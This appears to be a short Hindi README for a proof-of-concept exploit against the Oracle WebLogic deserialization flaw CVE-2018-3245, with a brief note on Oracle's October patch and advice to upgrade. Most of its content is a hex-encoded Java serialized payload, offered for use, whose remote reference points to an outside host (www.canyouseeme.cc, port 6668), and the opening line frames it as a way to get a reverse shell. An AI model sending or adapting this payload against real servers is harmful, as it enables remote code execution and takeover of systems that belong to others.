
CVE-2018-3245 के लिए एक्सप्लॉइट — Weblogic की एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता — जिसमें रिवर्स शेल प्राप्त करने के लिए एक पेलोड प्रदान किया गया है।
CVE-2018-3245
स्थानीय समय 16 अक्टूबर को, बीजिंग समय 17 अक्टूबर की सुबह, Oracle ने आधिकारिक रूप से अक्टूबर (तीसरी तिमाही) का क्रिटिकल पैच अपडेट CPU (Critical Patch Update) जारी किया,
इसमें जुलाई (दूसरी तिमाही) के CPU पैच में पूरी तरह से ठीक न की गई (CVE-2018-2893) Weblogic रिमोट कोड एक्सेक्यूशन भेद्यता को ठीक किया गया; इस बार नई ठीक की गई भेद्यता की संख्या CVE-2018-3245 है।
Oracle ने आधिकारिक रूप से इस क्रिटिकल पैच अपडेट (CPU) में इस भेद्यता को ठीक कर दिया है। प्रभावित उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे सुरक्षा के लिए जितनी जल्दी हो सके अपग्रेड करें।


jas502n-poc.txt
Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078
